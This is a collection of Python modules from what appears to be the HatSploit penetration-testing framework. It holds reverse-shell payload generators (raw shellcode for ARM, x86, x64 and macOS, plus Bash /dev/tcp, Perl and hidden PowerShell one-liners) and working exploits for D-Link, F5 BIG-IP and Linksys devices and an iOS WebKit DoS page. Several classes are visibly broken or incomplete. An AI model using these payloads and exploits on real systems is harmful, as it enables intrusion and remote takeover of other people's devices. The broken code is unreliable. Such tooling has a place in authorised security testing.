class HatSploitPayload(Payload, HatVenom, TCPClient): details = { 'Category': "stager", 'Name': "Linux armle Shell Reverse TCP", 'Payload': "linux/armle/shell_reverse_tcp", 'Authors': ['Ivan Nikolsky (enty8080)'], 'Description': "Shell reverse TCP payload for Linux armle.", 'Dependencies': [''], 'Comments': [''], 'Architecture': "armle", 'Platform': "linux", 'Risk': "high", 'Type': "reverse_tcp" } options = { 'LHOST': { 'Description': "Local host.", 'Value': TCPClient.get_local_host(), 'Type': "ip", 'Required': True }, 'LPORT': { 'Description': "Local port.", 'Value': 8888, 'Type': "port", 'Required': True } } def run(self): local_host, local_port = self.parse_options(self.options) offsets = {'lhost': local_host, 'lport': local_port} self.output_process("Generating shellcode...") shellcode = (b"\x01\x10\x8F\xE2" b"\x11\xFF\x2F\xE1" b"\x02\x20\x01\x21" b"\x92\x1A\x0F\x02" b"\x19\x37\x01\xDF" b"\x06\x1C\x08\xA1" b"\x10\x22\x02\x37" b"\x01\xDF\x3F\x27" b"\x02\x21\x30\x1c" b"\x01\xdf\x01\x39" b"\xFB\xD5\x05\xA0" b"\x92\x1a\x05\xb4" b"\x69\x46\x0b\x27" b"\x01\xDF\xC0\x46" b"\x02\x00" b":lport:port:" b":lhost:ip:" b"\x2f\x62\x69\x6e" b"\x2f\x73\x68\x00") self.output_process("Generating payload...") payload = self.generate('elf', 'armle', shellcode, offsets) return payload
class HatSploitModule(Module, Handler, TCPClient): details = { 'Name': "Reverse TCP Stager", 'Module': "exploit/unix/stager/reverse_tcp", 'Authors': ['Ivan Nikolsky (enty8080)'], 'Description': "Reverse TCP Stager.", 'Dependencies': [''], 'Comments': [''], 'Platform': "unix", 'Risk': "high" } payload = { 'Description': "Payload to use.", 'Value': "unix/generic/bash_reverse_tcp", 'Categories': None, 'Architectures': None, 'Platforms': None, 'Types': None } options = { 'SRVHOST': { 'Description': "Local host to listen on.", 'Value': TCPClient.get_local_host(), 'Type': "ip", 'Required': True }, 'SRVPORT': { 'Description': "Local port to listen on.", 'Value': 8888, 'Type': "port", 'Required': True }, 'FOREVER': { 'Description': "Start listener forever.", 'Value': "no", 'Type': "boolean", 'Required': False } } def run(self): local_host, local_port, forever = self.parse_options(self.options) if forever.lower() in ['yes', 'y']: while True: status = self.handle_session(host=local_host, port=local_port, payload=self.payload, method="reverse_tcp") if not status: return else: self.handle_session(host=local_host, port=local_port, payload=self.payload, method="reverse_tcp")
class HatSploitPayload(Payload, PayloadGenerator, TCPClient): details = { 'Category': "stager", 'Name': "macOS x64 Shell Reverse TCP", 'Payload': "macos/x64/shell_reverse_tcp", 'Authors': ['Ivan Nikolsky (enty8080)'], 'Description': "Shell reverse TCP payload for macOS x64.", 'Dependencies': [''], 'Comments': [''], 'Architecture': "x64", 'Platform': "macos", 'Risk': "high", 'Type': "reverse_tcp" } options = { 'LHOST': { 'Description': "Local host.", 'Value': TCPClient.get_local_host(), 'Type': "ip", 'Required': True }, 'LPORT': { 'Description': "Local port.", 'Value': 8888, 'Type': "port", 'Required': True }, 'FORMAT': { 'Description': "Executable format.", 'Value': "macho", 'Type': None, 'Required': True } } def run(self): local_host, local_port, executable_format = self.parse_options( self.options) local_host = self.host_to_bytes(local_host) local_port = self.port_to_bytes(local_port) if executable_format not in self.formats.keys(): self.output_error("Invalid executable format!") return self.output_process("Generating shellcode...") shellcode = (b"") self.output_process("Generating payload...") payload = self.generate(executable_format, 'x64', shellcode) return payload
class HatSploitPayload(Payload, TCPClient): config = Config() details = { 'Category': "stager", 'Name': "macOS aarch64 Membrane Reverse TCP", 'Payload': "macos/aarch64/membrane_reverse_tcp", 'Authors': ['Ivan Nikolsky (enty8080)'], 'Description': "Membrane reverse TCP payload for macOS aarch64.", 'Dependencies': [''], 'Comments': [''], 'Architecture': "aarch64", 'Platform': "macos", 'Risk': "high", 'Type': "reverse_tcp" } options = { 'LHOST': { 'Description': "Local host.", 'Value': TCPClient.get_local_host(), 'Type': "ip", 'Required': True }, 'LPORT': { 'Description': "Local port.", 'Value': 8888, 'Type': "port", 'Required': True } } def run(self): local_host, local_port = self.parse_options(self.options) remote_data = base64.b64encode( (local_host + ':' + local_port).encode()) remote_data = remote_data.decode() self.output_process("Generating payload...") try: binary = open( self.config.path_config['base_paths']['data_path'] + 'payloads/macos/aarch64/membrane_reverse_tcp/bin/membrane.bin', 'rb') payload = binary.close() except Exception: self.output_error("Failed to generate payload!") return return payload, remote_data, HatSploitSession
class HatSploitPayload(Payload, StringTools, TCPClient): details = { 'Category': "stager", 'Name': "macOS x64 Membrane Reverse TCP", 'Payload': "macos/x64/membrane_reverse_tcp", 'Authors': [ 'Ivan Nikolsky (enty8080)' ], 'Description': "Membrane reverse TCP payload for macOS x64.", 'Dependencies': [ '' ], 'Comments': [ '' ], 'Architecture': "x64", 'Platform': "macos", 'Risk': "high", 'Type': "reverse_tcp" } options = { 'LHOST': { 'Description': "Local host.", 'Value': TCPClient.get_local_host(), 'Type': "ip", 'Required': True }, 'LPORT': { 'Description': "Local port.", 'Value': 8888, 'Type': "port", 'Required': True } } def run(self): local_host, local_port = self.parse_options(self.options) local_host = self.xor_string(local_host) local_port = self.xor_string(local_port) self.output_process("Generating payload...") with open('data/membrane/macos/x64/membrane', 'rb') as f: payload = return payload, f"reverse '{local_host}' '{local_port}'", HatSploitSession
class HatSploitPayload(Payload, HatVenom, TCPClient): details = { 'Category': "stager", 'Name': "macOS x64 Shell Reverse TCP", 'Payload': "macos/x64/shell_reverse_tcp", 'Authors': ['Ivan Nikolsky (enty8080)'], 'Description': "Shell reverse TCP payload for macOS x64.", 'Dependencies': [''], 'Comments': [''], 'Architecture': "x64", 'Platform': "macos", 'Risk': "high", 'Type': "reverse_tcp" } options = { 'LHOST': { 'Description': "Local host.", 'Value': TCPClient.get_local_host(), 'Type': "ip", 'Required': True }, 'LPORT': { 'Description': "Local port.", 'Value': 8888, 'Type': "port", 'Required': True } } def run(self): local_host, local_port = self.parse_options(self.options) offsets = {'lhost': local_host, 'lport': local_port} self.output_process("Generating shellcode...") shellcode = (b":lhost:ip:" b":lport:port:") self.output_process("Generating payload...") payload = self.generate('macho', 'x64', shellcode, offsets) return payload
class HatSploitPayload(Payload, TCPClient): details = { 'Category': "single", 'Name': "Perl Shell Reverse TCP", 'Payload': "unix/generic/perl_reverse_tcp", 'Authors': ['Ivan Nikolsky (enty8080)'], 'Description': "Perl shell reverse TCP payload.", 'Dependencies': [''], 'Comments': [''], 'Architecture': "generic", 'Platform': "unix", 'Risk': "high", 'Type': "reverse_tcp" } options = { 'LHOST': { 'Description': "Local host.", 'Value': TCPClient.get_local_host(), 'Type': "ip", 'Required': True }, 'LPORT': { 'Description': "Local port.", 'Value': 8888, 'Type': "port", 'Required': True } } def run(self): local_host, local_port = self.parse_options(self.options) local_data = local_host + ':' + local_port self.output_process("Generating payload...") payload = "perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,\"LOCAL_DATA\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'" payload = payload.replace("LOCAL_DATA", local_data) return payload
class HatSploitPayload(Payload, TCPClient): details = { 'Category': "single", 'Name': "Bash Shell Reverse TCP", 'Payload': "unix/generic/bash_reverse_tcp", 'Authors': ['Ivan Nikolsky (enty8080)'], 'Description': "Bash shell reverse TCP payload.", 'Dependencies': [''], 'Comments': [''], 'Architecture': "generic", 'Platform': "unix", 'Risk': "high", 'Type': "reverse_tcp" } options = { 'LHOST': { 'Description': "Local host.", 'Value': TCPClient.get_local_host(), 'Type': "ip", 'Required': True }, 'LPORT': { 'Description': "Local port.", 'Value': 8888, 'Type': "port", 'Required': True } } def run(self): local_host, local_port = self.parse_options(self.options) self.output_process("Generating payload...") payload = f"/bin/sh &>/dev/tcp/{local_host}/{local_port} 0>&1 &" return payload
class HatSploitModule(Module, Handler, StringTools, HTTPClient, TCPClient): details = { 'Name': "D-Link hedwig Remote Code Execution", 'Module': "exploit/unix/dlink/hedwig_code_execution", 'Authors': ['Ivan Nikolsky (enty8080)', 'Roberto Paleari'], 'Description': "Remote Code Execution in D-Link DIR-645 <= 1.03, DIR-300 <= 2.14, DIR-600.", 'Dependencies': [''], 'Comments': [''], 'Platform': "unix", 'Risk': "high" } payload = { 'Description': "Payload to use.", 'Value': "linux/mipsle/shell_reverse_tcp", 'Categories': None, 'Architectures': ['mipsle', 'mipsbe', 'generic'], 'Platforms': None, 'Types': None } options = { 'RHOST': { 'Description': "Remote host.", 'Value': None, 'Type': "ip", 'Required': True }, 'RPORT': { 'Description': "Remote port.", 'Value': 80, 'Type': "port", 'Required': True }, 'SRVHOST': { 'Description': "Local host to listen on.", 'Value': TCPClient.get_local_host(), 'Type': "ip", 'Required': True }, 'SRVPORT': { 'Description': "Local port to listen on.", 'Value': 8888, 'Type': "port", 'Required': True } } def execute_command(self, remote_host, remote_port, command): command = command.encode("utf-8") libcbase = 0x2aaf8000 system = 0x000531FF calcsystem = 0x000158C8 callsystem = 0x000159CC shellcode = self.random_string(973).encode("utf-8") shellcode += struct.pack("<I", libcbase + system) shellcode += self.random_string(16).encode("utf-8") shellcode += struct.pack("<I", libcbase + callsystem) shellcode += self.random_string(12).encode("utf-8") shellcode += struct.pack("<I", libcbase + calcsystem) shellcode += self.random_string(16).encode("utf-8") shellcode += command headers = { "Content-Type": "application/x-www-form-urlencoded", "Cookie": b"uid=" + shellcode + b";" } data = {self.random_string(7): self.random_string(7)} self.http_request(method="POST", host=remote_host, port=remote_port, path='/hedwig.cgi', data=data, headers=headers) def check_vulnerable(self, remote_host, remote_port): response = self.http_request(method="GET", host=remote_host, port=remote_port, path="/hedwig.cgi") if response is None or response.status_code != 200: return False def run(self): remote_host, remote_port, local_host, local_port = self.parse_options( self.options) self.output_process(f"Exploiting {remote_host}...") if not self.check_vulnerable(remote_host, remote_port): self.output_error("Exploit failed!") return self.handle_session(host=local_host, port=local_port, payload=self.payload, sender=self.execute_command, args=[remote_host, remote_port], timeout=10)
class HatSploitModule(Module, HTTPClient, TCPClient): details = { 'Name': "iPhoneOS Safari WebKit Filter DoS", 'Module': "exploit/iphoneos/safari/webkit_filter_dos", 'Authors': ['Ivan Nikolsky (enty8080)', 'Sabri Haddouche (pwnsdx)'], 'Description': "iPhoneOS 9.1 till 12.1 WebKit Filter DoS.", 'Dependencies': [''], 'Comments': [''], 'Platform': "iphoneos", 'Risk': "high" } options = { 'LHOST': { 'Description': "Local host.", 'Value': TCPClient.get_local_host(), 'Type': "ip", 'Required': True }, 'LPORT': { 'Description': "Local port.", 'Value': 80, 'Type': "port", 'Required': True }, 'FOREVER': { 'Description': "Start http server forever.", 'Value': "no", 'Type': "boolean", 'Required': False } } @staticmethod def generate(): div_line = '<div>' * 3500 + '</div>' * 3500 payload = """ <html> <head> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"/> <style> div { backdrop-filter: blur(10px); -webkit-backdrop-filter: blur(10px); width:10000px; height:10000px; } </style> </head> <body> """ + div_line + """ </body> </html> """ return payload def run(self): local_host, local_port, forever = self.parse_options(self.options) self.output_process(f"Performing DoS attack on {remote_host}...") payload = self.generate() self.start_server(local_host, local_port, payload, True if forever in ['yes', 'y'] else False) self.output_success("DoS attack successfully completed!")
class HatSploitPayload(Payload, HatVenom, TCPClient): details = { 'Category': "stager", 'Name': "Linux x64 Shell Reverse TCP", 'Payload': "linux/x64/shell_reverse_tcp", 'Authors': ['Ivan Nikolsky (enty8080)'], 'Description': "Shell reverse TCP payload for Linux x64.", 'Dependencies': [''], 'Comments': [''], 'Architecture': "x64", 'Platform': "linux", 'Risk': "high", 'Type': "reverse_tcp" } options = { 'LHOST': { 'Description': "Local host.", 'Value': TCPClient.get_local_host(), 'Type': "ip", 'Required': True }, 'LPORT': { 'Description': "Local port.", 'Value': 8888, 'Type': "port", 'Required': True } } def run(self): local_host, local_port = self.parse_options(self.options) offsets = {'lhost': local_host, 'lport': local_port} self.output_process("Generating shellcode...") shellcode = ( b"\x6a\x29" # pushq $0x29 b"\x58" # pop %rax b"\x99" # cltd b"\x6a\x02" # pushq $0x2 b"\x5f" # pop %rdi b"\x6a\x01" # pushq $0x1 b"\x5e" # pop %rsi b"\x0f\x05" # syscall b"\x48\x97" # xchg %rax,%rdi b"\x48\xb9\x02\x00" # movabs $0x100007fb3150002,%rcx b":lport:port:" # port b":lhost:ip:" # ip b"\x51" # push %rcx b"\x48\x89\xe6" # mov %rsp,%rsi b"\x6a\x10" # pushq $0x10 b"\x5a" # pop %rdx b"\x6a\x2a" # pushq $0x2a b"\x58" # pop %rax b"\x0f\x05" # syscall b"\x6a\x03" # pushq $0x3 b"\x5e" # pop %rsi b"\x48\xff\xce" # dec %rsi b"\x6a\x21" # pushq $0x21 b"\x58" # pop %rax b"\x0f\x05" # syscall b"\x75\xf6" # jne 27 <dup2_loop> b"\x6a\x3b" # pushq $0x3b b"\x58" # pop %rax b"\x99" # cltd b"\x48\xbb\x2f\x62\x69\x6e\x2f" # movabs $0x68732f6e69622f,%rbx b"\x73\x68\x00" # [redacted] b"\x53" # push %rbx b"\x48\x89\xe7" # mov %rsp,%rdi b"\x52" # push %rdx b"\x57" # push %rdi b"\x48\x89\xe6" # mov %rsp,%rsi b"\x0f\x05" # syscall ) self.output_process("Generating payload...") payload = self.generate('elf', 'x64', shellcode, offsets) return payload
class HatSploitPayload(Payload, HatVenom, TCPClient): details = { 'Category': "stager", 'Name': "macOS x64 Shell Reverse TCP", 'Payload': "macos/x64/shell_reverse_tcp", 'Authors': ['Ivan Nikolsky (enty8080)'], 'Description': "Shell reverse TCP payload for macOS x64.", 'Dependencies': [''], 'Comments': [''], 'Architecture': "x64", 'Platform': "macos", 'Risk': "high", 'Type': "reverse_tcp" } options = { 'LHOST': { 'Description': "Local host.", 'Value': TCPClient.get_local_host(), 'Type': "ip", 'Required': True }, 'LPORT': { 'Description': "Local port.", 'Value': 8888, 'Type': "port", 'Required': True } } def run(self): local_host, local_port = self.parse_options(self.options) offsets = {'lhost': local_host, 'lport': local_port} self.output_process("Generating shellcode...") shellcode = ( b"\x41\xb0\x02" # movb $2, %r8b b"\x49\xc1\xe0\x18" # shlq $24, %r8 b"\x49\x83\xc8\x61" # orq $97, %r8 b"\x4c\x89\xc0" # movq %r8, %rax b"\x48\x31\xd2" # xorq %rdx, %rdx b"\x48\x89\xd6" # movq %rdx, %rsi b"\x48\xff\xc6" # incq %rsi b"\x48\x89\xf7" # movq %rsi, %rdi b"\x48\xff\xc7" # incq %rdi b"\x0f\x05" # syscall b"\x49\x89\xc4" # movq %rax, %r12 b"\x49\xbd\x01\x01" # movabsq $-2750349055, %r13 b":lport:port:" # port b":lhost:ip:" # host b"\x41\xb1\xff" # movb $-1, %r9b b"\x4d\x29\xcd" # subq %r9, %r13 b"\x41\x55" # pushq %r13 b"\x49\x89\xe5" # movq %rsp, %r13 b"\x49\xff\xc0" # incq %r8 b"\x4c\x89\xc0" # movq %r8, %rax b"\x4c\x89\xe7" # movq %r12, %rdi b"\x4c\x89\xee" # movq %r13, %rsi b"\x48\x83\xc2\x10" # addq $16, %rdx b"\x0f\x05" # syscall b"\x49\x83\xe8\x08" # subq $8, %r8 b"\x48\x31\xf6" # xorq %rsi, %rsi b"\x4c\x89\xc0" # movq %r8, %rax b"\x4c\x89\xe7" # movq %r12, %rdi b"\x0f\x05" # syscall b"\x48\x83\xfe\x02" # cmpq $2, %rsi b"\x48\xff\xc6" # incq %rsi b"\x76\xef" # jbe -17 <dup> b"\x49\x83\xe8\x1f" # subq $31, %r8 b"\x4c\x89\xc0" # movq %r8, %rax b"\x48\x31\xd2" # xorq %rdx, %rdx b"\x49\xbd\xff\x2f\x62\x69\x6e\x2f\x73\x68" # movabsq $7526411553527181311, %r13 b"\x49\xc1\xed\x08" # shrq $8, %r13 b"\x41\x55" # pushq %r13 b"\x48\x89\xe7" # movq %rsp, %rdi b"\x48\x31\xf6" # xorq %rsi, %rsi b"\x0f\x05" # syscall ) self.output_process("Generating payload...") payload = self.generate('macho', 'x64', shellcode, offsets) return payload
class HatSploitModule(Module, Handler, HTTPClient, TCPClient): details = { 'Name': "F5 Big-IP TMUI Remote Code Execution", 'Module': "exploit/unix/f5/big_ip_tmui_rce", 'Authors': ['Ivan Nikolsky (enty8080)', 'Mikhail Klyuchnikov'], 'Description': "Remote Code Execution in F5 BIG-IP Traffic Management User Interface (TMUI).", 'Dependencies': [''], 'Comments': [''], 'Platform': "unix", 'Risk': "high" } payload = { 'Description': "Payload to use.", 'Value': "unix/generic/netcat_reverse_tcp", 'Categories': ['single'], 'Architectures': None, 'Platforms': None, 'Types': ['reverse_tcp'] } options = { 'RHOST': { 'Description': "Remote host.", 'Value': None, 'Type': "ip", 'Required': True }, 'RPORT': { 'Description': "Remote port.", 'Value': None, 'Type': "port", 'Required': True }, 'SRVHOST': { 'Description': "Local host to listen on.", 'Value': TCPClient.get_local_host(), 'Type': "ip", 'Required': True }, 'SRVPORT': { 'Description': "Local port to listen on.", 'Value': 8888, 'Type': "port", 'Required': True } } def execute_command(self, remote_host, remote_port, command): path = f"/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command={command}" self.http_request(method="GET", host=remote_host, port=remote_port, path=path) def run(self): remote_host, remote_port, local_host, local_port = self.parse_options( self.options) self.output_process(f"Exploiting {remote_host}...") self.handle_session(host=local_host, port=local_port, payload=self.payload, sender=self.execute_command, args=[remote_host, remote_port], timeout=10)
class HatSploitPayload(Payload, HatVenom, TCPClient): details = { 'Category': "stager", 'Name': "Linux x86 Shell Reverse TCP", 'Payload': "linux/x86/shell_reverse_tcp", 'Authors': [ 'Ivan Nikolsky (enty8080)' ], 'Description': "Shell reverse TCP payload for Linux x86.", 'Dependencies': [ '' ], 'Comments': [ '' ], 'Architecture': "x86", 'Platform': "linux", 'Risk': "high", 'Type': "reverse_tcp" } options = { 'LHOST': { 'Description': "Local host.", 'Value': TCPClient.get_local_host(), 'Type': "ip", 'Required': True }, 'LPORT': { 'Description': "Local port.", 'Value': 8888, 'Type': "port", 'Required': True } } def run(self): local_host, local_port = self.parse_options(self.options) offsets = { 'lhost': local_host, 'lport': local_port } self.output_process("Generating shellcode...") shellcode = ( b"\x31\xdb" # xor ebx,ebx b"\xf7\xe3" # mul ebx b"\x53" # push ebx b"\x43" # inc ebx b"\x53" # push ebx b"\x6a\x02" # push byte +0x2 b"\x89\xe1" # mov ecx,esp b"\xb0\x66" # mov al,0x66 (sys_socketcall) b"\xcd\x80" # int 0x80 b"\x93" # xchg eax,ebx b"\x59" # pop ecx b"\xb0\x3f" # mov al,0x3f (sys_dup2) b"\xcd\x80" # int 0x80 b"\x49" # dec ecx b"\x79\xf9" # jns 0x11 b"\x68:lhost:ip:" # push ip addr b"\x68\x02\x00" # push port b":lport:port:" b"\x89\xe1" # mov ecx,esp b"\xb0\x66" # mov al,0x66 (sys_socketcall) b"\x50" # push eax b"\x51" # push ecx b"\x53" # push ebx b"\xb3\x03" # mov bl,0x3 b"\x89\xe1" # mov ecx,esp b"\xcd\x80" # int 0x80 b"\x52" # push edx b"\x68\x6e\x2f\x73\x68" # push n/sh b"\x68\x2f\x2f\x62\x69" # push //bi b"\x89\xe3" # mov ebx,esp b"\x52" # push edx b"\x53" # push ebx b"\x89\xe1" # mov ecx,esp b"\xb0\x0b" # mov al,0xb (execve) b"\xcd\x80" # int 0x80 ) self.output_process("Generating payload...") payload = self.generate('elf', 'x86', shellcode, offsets) return payload
class HatSploitPayload(Payload, PayloadGenerator, TCPClient): details = { 'Category': "stager", 'Name': "Linux x86 Shell Reverse TCP", 'Payload': "linux/x86/shell_reverse_tcp", 'Authors': ['Ivan Nikolsky (enty8080)'], 'Description': "Shell reverse TCP payload for Linux x86.", 'Dependencies': [''], 'Comments': [''], 'Architecture': "x86", 'Platform': "linux", 'Risk': "high", 'Type': "reverse_tcp" } options = { 'LHOST': { 'Description': "Local host.", 'Value': TCPClient.get_local_host(), 'Type': "ip", 'Required': True }, 'LPORT': { 'Description': "Local port.", 'Value': 8888, 'Type': "port", 'Required': True }, 'FORMAT': { 'Description': "Executable format.", 'Value': "elf", 'Type': None, 'Required': True } } def run(self): local_host, local_port, executable_format = self.parse_options( self.options) local_host = self.host_to_bytes(local_host) local_port = self.port_to_bytes(local_port) if executable_format not in self.formats.keys(): self.output_error("Invalid executable format!") return self.output_process("Generating shellcode...") shellcode = ( b"\x31\xdb" # xor ebx,ebx b"\xf7\xe3" # mul ebx b"\x53" # push ebx b"\x43" # inc ebx b"\x53" # push ebx b"\x6a\x02" # push byte +0x2 b"\x89\xe1" # mov ecx,esp b"\xb0\x66" # mov al,0x66 (sys_socketcall) b"\xcd\x80" # int 0x80 b"\x93" # xchg eax,ebx b"\x59" # pop ecx b"\xb0\x3f" # mov al,0x3f (sys_dup2) b"\xcd\x80" # int 0x80 b"\x49" # dec ecx b"\x79\xf9" # jns 0x11 b"\x68" + local_host + # push ip addr b"\x68\x02\x00" + local_port + # push port b"\x89\xe1" # mov ecx,esp b"\xb0\x66" # mov al,0x66 (sys_socketcall) b"\x50" # push eax b"\x51" # push ecx b"\x53" # push ebx b"\xb3\x03" # mov bl,0x3 b"\x89\xe1" # mov ecx,esp b"\xcd\x80" # int 0x80 b"\x52" # push edx b"\x68\x6e\x2f\x73\x68" # push n/sh b"\x68\x2f\x2f\x62\x69" # push //bi b"\x89\xe3" # mov ebx,esp b"\x52" # push edx b"\x53" # push ebx b"\x89\xe1" # mov ecx,esp b"\xb0\x0b" # mov al,0xb (execve) b"\xcd\x80" # int 0x80 ) self.output_process("Generating payload...") payload = self.generate(executable_format, 'x86', shellcode) return payload
class HatSploitPayload(Payload, TCPClient): details = { 'Category': "single", 'Name': "Powershell Reverse TCP", 'Payload': "unix/generic/powershell_reverse_tcp", 'Authors': [ 'Ivan Nikolsky (enty8080)' ], 'Description': "Powershell reverse TCP payload.", 'Dependencies': [ '' ], 'Comments': [ '' ], 'Architecture': "generic", 'Platform': "windows", 'Risk': "high", 'Type': "reverse_tcp" } options = { 'LHOST': { 'Description': "Local host.", 'Value': TCPClient.get_local_host(), 'Type': "ip", 'Required': True }, 'LPORT': { 'Description': "Local port.", 'Value': 8888, 'Type': "port", 'Required': True } } def run(self): local_host, local_port = self.parse_options(self.options) self.output_process("Generating payload...") source = ( f"$a='{local_host}';" f"$b={local_port};" "$c=New-Object;" "$nb=New-Object System.Byte[] $c.ReceiveBufferSize;" "$ob=New-Object System.Byte[] 65536;" "$eb=New-Object System.Byte[] 65536;" "$e=new-object System.Text.UTF8Encoding;" "$p=New-Object System.Diagnostics.Process;" "$p.StartInfo.FileName='cmd.exe';" "$p.StartInfo.RedirectStandardInput=1;" "$p.StartInfo.RedirectStandardOutput=1;" "$p.StartInfo.RedirectStandardError=1;" "$p.StartInfo.UseShellExecute=0;" "$q=$p.Start();" "$is=$p.StandardInput;" "$os=$p.StandardOutput;" "$es=$p.StandardError;" "$osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);" "$esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);" "$c.connect($a,$b);" "$s=$c.GetStream();" "while ($true) {" "start-sleep -m 100;" "if ($osread.IsCompleted -and $osread.Result -ne 0) {" "$r=$os.BaseStream.EndRead($osread);" "$s.Write($ob,0,$r);" "$s.Flush();" "$osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);" "}" "if ($esread.IsCompleted -and $esread.Result -ne 0) {" "$r=$es.BaseStream.EndRead($esread);" "$s.Write($eb,0,$r);" "$s.Flush();" "$esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);" "}" "if ($s.DataAvailable) {" "$r=$s.Read($nb,0,$nb.Length);" "if ($r -lt 1) {" "break;" "} else {" "$str=$e.GetString($nb,0,$r);" "$is.write($str);" "}" "}" "if ($c.Connected -ne $true -or ($c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectRead) -and $c.Client.Available -eq 0)) {" "break;" "}" "if ($p.ExitCode -ne $null) {" "break;" "}" "}" ) payload = f"powershell -w hidden -nop -c {source}" return payload
class HatSploitModule(Module, Handler, HTTPClient, TCPClient): details = { 'Name': "F5 Big-IP iControl Remote Code Execution", 'Module': "exploit/unix/f5/big_ip_icontrol_rce", 'Authors': [ 'Ivan Nikolsky (enty8080)', 'Al1ex (Al1ex)' ], 'Description': "Remote Code Execution in F5 BIG-IP iControl REST.", 'Dependencies': [ '' ], 'Comments': [ '' ], 'Platform': "unix", 'Risk': "high" } payload = { 'Description': "Payload to use.", 'Value': "unix/generic/bash_reverse_tcp", 'Categories': [ 'single' ], 'Architectures': None, 'Platforms': None, 'Types': [ 'reverse_tcp' ] } options = { 'RHOST': { 'Description': "Remote host.", 'Value': None, 'Type': "ip", 'Required': True }, 'RPORT': { 'Description': "Remote port.", 'Value': None, 'Type': "port", 'Required': True }, 'SRVHOST': { 'Description': "Local host to listen on.", 'Value': TCPClient.get_local_host(), 'Type': "ip", 'Required': True }, 'SRVPORT': { 'Description': "Local port to listen on.", 'Value': 8888, 'Type': "port", 'Required': True } } def execute_command(self, remote_host, remote_port, command): headers = { "User-Agent": "None", "Content-Type": "application/json", "X-F5-Auth-Token": "", "Authorization": "Basic YWRtaW46QVNhc1M=" } shell_trap = '/mgmt/tm/util/bash' payload = {"command": "run", "utilCmdArgs": f"-c '{command}'"} self.http_request( method="POST", host=remote_host, port=remote_port, headers=headers, path=shell_trap, json=payload ) def run(self): remote_host, remote_port, local_host, local_port = self.parse_options(self.options) self.output_process(f"Exploiting {remote_host}...") self.handle_session( host=local_host, port=local_port, payload=self.payload, sender=self.execute_command, args=[remote_host, remote_port], timeout=10 )
class HatSploitModule(Module, Handler, HTTPClient, TCPClient): details = { 'Name': "Linksys E-Series tmUnblock Remote Code Execution", 'Module': "exploit/unix/linksys/eseries_tmunblock_rce", 'Authors': ['Ivan Nikolsky (enty8080)', 'Johannes Ullrich (jullrich)'], 'Description': "Remote Code Execution in Linksys E-Series.", 'Dependencies': [''], 'Comments': [''], 'Platform': "unix", 'Risk': "high" } payload = { 'Description': "Payload to use.", 'Value': "linux/mipsle/shell_reverse_tcp", 'Categories': None, 'Architectures': ['mipsle', 'mipsbe', 'generic'], 'Platforms': None, 'Types': None } options = { 'RHOST': { 'Description': "Remote host.", 'Value': None, 'Type': "ip", 'Required': True }, 'RPORT': { 'Description': "Remote port.", 'Value': 80, 'Type': "port", 'Required': True }, 'SRVHOST': { 'Description': "Local host to listen on.", 'Value': TCPClient.get_local_host(), 'Type': "ip", 'Required': True }, 'SRVPORT': { 'Description': "Local port to listen on.", 'Value': 8888, 'Type': "port", 'Required': True } } def execute_command(self, remote_host, remote_port, command): payload = { "submit_button": "", "change_action": "", "action": "", "commit": "0", "ttcp_num": "2", "ttcp_size": "2", "ttcp_ip": f"-h `{command}`", "StartEPI": "1" } self.http_request(method="POST", host=remote_host, port=remote_port, data=payload) def check_vulnerable(self, remote_host, remote_port): response = self.http_request(method="GET", host=remote_host, port=remote_port, path="/tmUnblock.cgi") if response is None or response.status_code != 200: return False def run(self): remote_host, remote_port, local_host, local_port = self.parse_options( self.options) self.output_process(f"Exploiting {remote_host}...") if not self.check_vulnerable(remote_host, remote_port): self.output_error("Exploit failed!") return self.handle_session(host=local_host, port=local_port, payload=self.payload, sender=self.execute_command, args=[remote_host, remote_port], timeout=10)
class HatSploitPayload(Payload, PayloadGenerator, TCPClient): details = { 'Category': "stager", 'Name': "Android armle Shell Reverse TCP", 'Payload': "android/armle/shell_reverse_tcp", 'Authors': [ 'Ivan Nikolsky (enty8080)' ], 'Description': "Shell reverse TCP payload for Android armle.", 'Dependencies': [ '' ], 'Comments': [ '' ], 'Architecture': "armle", 'Platform': "android", 'Risk': "high", 'Type': "reverse_tcp" } options = { 'LHOST': { 'Description': "Local host.", 'Value': TCPClient.get_local_host(), 'Type': "ip", 'Required': True }, 'LPORT': { 'Description': "Local port.", 'Value': 8888, 'Type': "port", 'Required': True }, 'FORMAT': { 'Description': "Executable format.", 'Value': "elf", 'Type': None, 'Required': True } } def run(self): local_host, local_port, executable_format = self.parse_options(self.options) local_host = self.host_to_bytes(local_host) local_port = self.port_to_bytes(local_port) if executable_format not in self.formats.keys(): self.output_error("Invalid executable format!") return self.output_process("Generating shellcode...") shellcode = ( b"\x01\x10\x8F\xE2" b"\x11\xFF\x2F\xE1" b"\x02\x20\x01\x21" b"\x92\x1A\x0F\x02" b"\x19\x37\x01\xDF" b"\x06\x1C\x08\xA1" b"\x10\x22\x02\x37" b"\x01\xDF\x3F\x27" b"\x02\x21\x30\x1c" b"\x01\xdf\x01\x39" b"\xFB\xD5\x05\xA0" b"\x92\x1a\x05\xb4" b"\x69\x46\x0b\x27" b"\x01\xDF\xC0\x46" b"\x02\x00" + local_port + # "\x12\x34" struct sockaddr and port + local_host + # reverse ip address b"\x2f\x73\x79\x73\x74\x65\x6d" # /system b"\x2f\x62\x69\x6e" # /bin b"\x2f\x73\x68\x00" # /sh\0 ) self.output_process("Generating payload...") payload = self.generate(executable_format, 'armle', shellcode) return payload
